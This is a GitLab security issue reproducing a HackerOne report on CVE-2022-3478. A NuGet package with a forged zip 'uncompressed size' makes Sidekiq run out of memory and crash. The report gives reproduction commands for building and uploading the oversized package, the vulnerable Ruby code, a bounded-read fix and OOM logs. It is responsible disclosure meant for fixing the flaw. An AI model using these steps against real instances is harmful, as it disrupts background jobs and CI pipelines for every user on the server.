CVE-2022-3478: Sidekiq background job DoS by uploading malicious Nuget packages (#377788)
An issue has been discovered in GitLab affecting all versions starting from 12.8 before 15.4.6, all versions starting from 15.5 before 15.5.5, all versions starting from 15.6 before 15.6.1. It was possible to trigger a DoS attack by uploading a malicious nuget package.
Open · Issue created Oct 13, 2022 by GitLab SecurityBot (@gitlab-securitybot), Reporter
Sidekiq background job DoS by uploading malicious Nuget packages
HackerOne report #1716296 by luryus on 2022-09-29, assigned to GitLab Team:
Report | Attachments | How To Reproduce
Report
Summary
By uploading a crafted malicious Nuget package, an attacker can cause Sidekiq to use too much memory and crash (get killed by the OOMKiller on Linux). In small (self-hosted) Gitlab environments with only a single Sidekiq node, this causes some background jobs to fail and delays the execution of others. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause a minor denial of service.
When a user uploads a Nuget package, Gitlab extracts its metadata in a Sidekiq background job. The extraction works by unzipping the .nuspec file from the nupkg package (nupkg files are plain old zip archives). The metadata extraction job first checks the nuspec file size recorded in the zip file metadata, to avoid reading overly large nuspec files. If this check succeeds, the job extracts the nuspec file into memory with no further size checks or limits.
An attacker can freely alter the metadata in the zip file and change the “uncompressed size” attribute of the nuspec file. They might, for example, create a nupkg file containing a 20-gigabyte nuspec file and alter the metadata such that the “uncompressed size” is 256 bytes. When such a file is uploaded to Gitlab, the extraction worker job tries to allocate a 20-gigabyte buffer for extracting the file. In most smaller environments this leads to Sidekiq getting killed.
Because the attacker only needs to upload a single small file (a few megabytes) to achieve this, it is difficult or impossible to mitigate this with rate limits. The attacker can even upload the same file repeatedly (e.g. every 5-10 seconds) without triggering rate limits, causing continuous crashes.
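To illustrate the mismatch concretely, here is a minimal Ruby sketch (not part of Gitlab and not the attached rewrite_size.py; it assumes the rubyzip gem and the crafted 20gig.nupkg built in the steps below). It prints the forged size declared by the zip metadata next to a small, capped amount of data actually inflated from the entry:

require 'zip'

Zip::File.open('20gig.nupkg') do |zip|
  entry = zip.glob('*.nuspec').first

  # entry.size comes straight from the archive metadata, so it reports the
  # forged value (e.g. 256 bytes) rather than anything about the real data.
  puts "declared uncompressed size: #{entry.size} bytes"

  # Inflate at most 1 MiB so this demo cannot exhaust memory. The fact that
  # a full 1 MiB comes out already shows the declared size cannot be trusted.
  inflated = entry.get_input_stream.read(1024 * 1024).to_s
  puts "bytes actually inflated (capped at 1 MiB): #{inflated.bytesize}"
end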
Steps to reproduce
Make sure the Nuget package repository is enabled in the Gitlab instance
Install the dotnet SDK locally
Create a personal project in Gitlab
Locally, set up a nuget source for pushing to the new project (replace the username, access token, Gitlab instance URL and project ID):
dotnet nuget add source -n "gitlab-nuget-test" -u <username> -p <personal_access_token> "http://<gitlab-url>/api/v4/projects/<project_id>/packages/nuget/index.json" --store-password-in-clear-text
Craft a malicious nuget package, for example with these steps (Linux commands):
# Create a big empty file. Here a 20 gig file is created, but this can be
# increased too if the sidekiq instance has a lot of memory
touch 20gig.nuspec
fallocate -z -l 20GiB 20gig.nuspec
# Zip it
zip -9 20gig.nupkg 20gig.nuspec
# Run the attached python script to change the "uncompressed size" attributes
python3 rewrite_size.py 20gig.nupkg
Upload the crafted package to Gitlab:
dotnet nuget push -s gitlab-nuget-test --interactive 20gig.nupkg
Observe Sidekiq crashes due to OOMKills in Gitlab server logs.
Impact
An attacker can get a Sidekiq worker OOMKilled with a simple file upload. This interrupts any background jobs running on that particular worker. Because the attack is so simple, the attacker can repeat it frequently to cause continuous crashes.
This can affect any user in the Gitlab instance because much of Gitlab’s functionality relies on Sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a “pending” state for a long time, if a background job for that pipeline was running when Sidekiq crashed.
What is the current bug behavior?
Gitlab’s Nuget extraction worker trusts the size indicated in the zip file metadata, but does not limit the actual decompressed file size.
Snippet from metadata_extraction_service.rb:
def nuspec_file_content
  with_zip_file do |zip_file|
    entry = zip_file.glob('*.nuspec').first

    raise ExtractionError, 'nuspec file not found' unless entry
    raise ExtractionError, 'nuspec file too big' if entry.size > MAX_FILE_SIZE

    entry.get_input_stream.read
  end
end

def with_zip_file(&block)
  package_file.file.use_open_file do |open_file|
    zip_file = Zip::File.new(open_file, false, true)
    yield(zip_file)
  end
end
With the malicious file, entry.size > MAX_FILE_SIZE returns false, because according to the zip file metadata the nuspec file is only 255 bytes long.
On the next line, no length parameter is given to the read call, so the entire uncompressed file is read into a memory buffer. With the example steps above this is 20 gigabytes, but the attacker controls the value and can make the file even bigger.
What is the expected correct behavior?
Gitlab should not only check the size recorded in the zip metadata, but also limit the amount of data actually read while unzipping, to avoid allocating too much RAM.
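As a rough sketch of one possible mitigation (this is not the actual patch shipped by GitLab), the read in nuspec_file_content could be bounded by the application's own limit instead of trusting the declared size:

def nuspec_file_content
  with_zip_file do |zip_file|
    entry = zip_file.glob('*.nuspec').first

    raise ExtractionError, 'nuspec file not found' unless entry
    raise ExtractionError, 'nuspec file too big' if entry.size > MAX_FILE_SIZE

    # Read at most MAX_FILE_SIZE + 1 bytes of inflated data and re-check the
    # result, so a forged "uncompressed size" can no longer force a huge
    # allocation.
    content = entry.get_input_stream.read(MAX_FILE_SIZE + 1).to_s
    raise ExtractionError, 'nuspec file too big' if content.bytesize > MAX_FILE_SIZE

    content
  end
end

The key point is that the amount of memory allocated is now bounded by Gitlab's own MAX_FILE_SIZE constant rather than by the attacker-controlled size field in the zip metadata.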
Relevant logs and/or screenshots
Logs depend on environment. OOMKills are easiest to observe in Linux kernel logs (dmesg).
Here is an example from my own instance: after a Nuget extraction job starts, SidekiqDaemon::MemoryKiller soon notices that Sidekiq is using too much memory, and then Linux kills Sidekiq before the MemoryKiller has a chance to shut it down gracefully (to clarify, SidekiqDaemon::MemoryKiller does not have time to do anything here before the Linux OOMKiller steps in).
{"severity":"INFO","time":"2022-09-29T06:12:36.295Z","retry":3,"queue":"default","version":0,"queue_namespace":"package_repositories","args":["1392"],"class":"Packages::Nuget::ExtractionWorker","jid":"30a8332b4d36ca1cb0170554","created_at":"2022-09-29T06:12:36.290Z","correlation_id":"01GE3Y080TVGVHFZ6089RPC8HZ","meta.caller_id":"PUT /api/:version/projects/:id/packages/nuget","meta.remote_ip":"172.18.0.1","meta.feature_category":"package_registry","meta.user":"root","meta.client_id":"user/1","meta.root_caller_id":"PUT /api/:version/projects/:id/packages/nuget","worker_data_consistency":"always","idempotency_key":"resque:gitlab:duplicate:default:a7e8f751bc2b7cb679eb178e069da05671c426d4a4374a47ab6762cb738db68e","size_limiter":"validated","enqueued_at":"2022-09-29T06:12:36.291Z","job_size_bytes":6,"pid":765,"message":"Packages::Nuget::ExtractionWorker JID-30a8332b4d36ca1cb0170554: start","job_status":"start","scheduling_latency_s":0.003906}
{"severity":"WARN","time":"2022-09-29T06:12:48.992Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":2824928,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(2824928) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
{"severity":"WARN","time":"2022-09-29T06:12:52.059Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":3650632,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(3650632) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
[Thu Sep 29 09:12:52 2022] Out of memory: Killed process 6891 (bundle) total-vm:16266276kB, anon-rss:5457436kB, file-rss:4kB, shmem-rss:792kB, UID:998 pgtables:17812kB oom_score_adj:0
{"severity":"INFO","time":"2022-09-29T06:12:59.788Z","message":"A worker terminated, shutting down the cluster"}
Results of GitLab environment info
Docker installation:
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version: 2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version: 6.4.2
Go Version: unknown
GitLab information
Version: 15.4.0-ee
Revision: abbda55531f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gl.lkoskela.com:8929
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git
SSH Clone URL: ssh://[email protected]:2224/some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
An attacker can get a Sidekiq worker OOMKilled with a simple file upload. This interrupts any background jobs running on that particular worker. Because the attack is so simple, the attacker can repeat it frequently to cause continuous crashes.
The severity depends on the Sidekiq setup: on larger, more distributed instances the impact is smaller, as crashes are limited to a subset of Sidekiq instances. In small self-hosted environments, though, this can have a large impact on Gitlab’s functionality.
This can affect any user in the Gitlab instance because much of Gitlab’s functionality relies on Sidekiq jobs. Background job execution may be delayed or, in some cases, jobs may not be executed at all (if the attacker keeps Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a “pending” state for a long time, if a background job for that pipeline was running when Sidekiq crashed.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- rewrite_size.py
How To Reproduce
Please add reproducibility information to this section: